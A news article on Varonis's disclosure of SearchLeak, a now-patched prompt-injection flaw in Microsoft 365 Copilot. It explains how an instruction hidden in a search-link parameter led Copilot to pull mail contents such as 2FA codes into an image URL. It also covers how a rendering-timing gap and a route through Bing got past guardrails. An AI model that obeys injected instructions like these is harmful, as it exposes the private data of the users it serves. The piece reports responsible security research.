News.cx
BREAKING NEWS Fox’s Roku deal would put its channels closer to 100 million homes
Technology

Microsoft patches Copilot flaw tied to 2FA code theft risk

Varonis said its SearchLeak exploit could make M365 Copilot expose sensitive user data through a crafted link.

Maya Lindqvist

By Maya Lindqvist · Senior Technology Correspondent

3 min read

Microsoft patches Copilot flaw tied to 2FA code theft risk
Photo: Ars Technica

Microsoft has patched a critical vulnerability in its M365 Copilot platform that researchers said could be used to pull two-factor authentication codes and other private data from a user’s accessible email. Security firm Varonis, which reported the issue to Microsoft, said its proof-of-concept attack worked after a target clicked a specially crafted link.

Varonis disclosed the technique, which it calls SearchLeak, after Microsoft issued a fix. Ars Technica reported that Microsoft gave the vulnerability its highest critical rating.

How the attack worked

The flaw centered on a known weakness in large language model tools: they can treat hostile instructions placed in outside content as if those instructions came from the user. According to Ars Technica, that boundary problem has forced AI vendors to rely on guardrails that try to limit what the systems can do with sensitive information.

One such guardrail prevents Copilot and similar tools from performing actions that could send user data to an attacker, such as submitting forms or sending email. Another Microsoft defense wrapped Copilot output so a browser would treat it as text rather than active web content, Ars Technica reported.

Varonis said it found a way around those protections by placing a malicious instruction inside the query parameter of a Microsoft 365 search URL. The firm described the method as “Parameter-to-Prompt Injection,” a variant of prompt injection in which the command sits inside a URL parameter rather than in an email or document.

In the scenario described by Varonis, an attacker sends the victim an email containing a Microsoft 365 search link. When clicked, the link instructs Copilot to search the user’s mail, extract information such as a subject line or code, and place it into an image URL.

The victim does not have to type a prompt, according to Varonis. After the click, Copilot carries out the instruction tied to the URL.

Guardrails failed too late

Varonis said the exploit took advantage of timing in Copilot’s response process. Before Copilot finished and applied the text-wrapping guardrail, the browser briefly rendered raw HTML, including an image tag.

That temporary rendering caused the browser to send an image request containing the targeted data, according to the researchers. Varonis said the later guardrail still appeared, yet the outbound request had already been made.

A second barrier limited which outside sites Copilot could contact without user approval. Varonis said it bypassed that restriction by routing the request through Bing, which was allowed under Copilot’s content security policy, and then onward to an attacker-controlled domain.

The company said the risk extended beyond personal inbox content because SearchLeak targeted Microsoft’s enterprise product tier. Varonis said the same approach could expose data available to the user inside an organization, including emails, meeting material, SharePoint documents, OneDrive files and other indexed business content.

Microsoft has fixed the specific vulnerabilities used by SearchLeak, according to Ars Technica. The broader class of prompt-injection attacks remains a continuing problem for AI systems that read untrusted content while acting on behalf of users.

This story draws on original reporting from Ars Technica.